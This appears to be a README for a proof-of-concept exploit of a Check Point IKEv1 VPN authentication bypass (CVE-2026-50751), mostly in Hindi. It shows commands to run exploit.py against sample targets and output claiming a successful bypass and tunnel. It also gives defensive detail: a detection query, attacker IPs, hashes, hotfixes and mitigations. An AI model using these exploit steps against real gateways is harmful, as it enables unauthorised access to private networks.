
भेद्यता: रिमोट एक्सेस और मोबाइल एक्सेस में तर्क प्रवाह कमजोरी
यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षणों के लिए है। अनधिकृत उपयोग, स्पष्ट अनुमति के बिना सिस्टम के खिलाफ, अवैध है। लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है।
CVE-2026-50751 Check Point के IKEv1 (पदावनत) प्रोटोकॉल में एक महत्वपूर्ण प्रमाणीकरण बायपास भेद्यता है, जो Remote Access VPN और Mobile Access को प्रभावित करती है। एक अप्रमाणित हमलावर प्रमाणपत्र सत्यापन में एक दोष का शोषण करके वैध पासवर्ड की आवश्यकता के बिना VPN कनेक्शन स्थापित कर सकता है।
| उत्पाद | संस्करण |
|---|---|
| Security Gateways | R80.40 - R82.10 IKEv1 सक्षम के साथ |
| Spark Firewalls | R80.20.X, R81.10.X, R82.00.X |
| Mobile Access | IKEv1 के साथ सभी संस्करण |
# Clonar repositorio
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC
# Instalar dependencias
pip install -r requirements.txt
# Dar permisos de ejecución
chmod +x exploit.py
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6
# Detectar si IKEv1 está habilitado
python3 detector.py -t 192.168.1.1 -p 500
# Escaneo rápido
python3 detector.py -t vpn.target.com -p 4500
# Ejecutar bypass de autenticación
python3 exploit.py -t 192.168.1.1 -p 500
# Con interfaz específica
python3 exploit.py -t vpn.target.com --interface eth0
# Modo verbose
python3 exploit.py -t 192.168.1.1 -p 500 -v
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-50751 - Check Point IKEv1 Authentication Bypass ║
║ Critical VPN Authentication Bypass Exploit ║
║ CVSS: 9.3 | CISA KEV: 2026-06-08 ║
╚═══════════════════════════════════════════════════════════════╝
[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available
[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately
# Query para detectar atacantes
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)
| प्रकार | मान |
|---|---|
| हमलावर आईपी | 45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173 |
| हैश | 52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce |
| संस्करण | हॉटफिक्स टेक | लिंक |
|---|---|---|
| R82.10 | Take 19 | डाउनलोड करें |
| R82 | Take 103 | डाउनलोड करें |
| R81.20 | Take 141 | डाउनलोड करें |
लीगेसी क्लाइंट अक्षम करें: SmartConsole → Gateway → VPN Clients → Authentication "Allow older clients" को अनचेक करें
केवल IKEv2 बलपूर्वक लागू करें: Global Properties → Remote Access → VPN Authentication "IKEv2 only" चुनें
मशीन प्रमाणपत्र अनिवार्य करें: VPN Clients → Authentication → Machine Certificate Authentication "Mandatory" के रूप में सेट करें
| तिथि | घटना |
|---|---|
| 2026-05-07 | पहला शोषण देखा गया |
| 2026-06-04 | Check Point जांच शुरू करता है |
| 2026-06-08 | CVE प्रकाशित, CISA KEV में जोड़ता है |
| 2026-06-11 | पैच करने के लिए CISA की अंतिम तिथि |
यह सॉफ्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी प्रकार की वारंटी के। लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है। इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।
⭐ यदि यह PoC आपके लिए उपयोगी था, तो रिपॉजिटरी को एक स्टार देने पर विचार करें
text
📦 requirements.txt
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6
⚠️ GitHub के लिए महत्वपूर्ण नोट: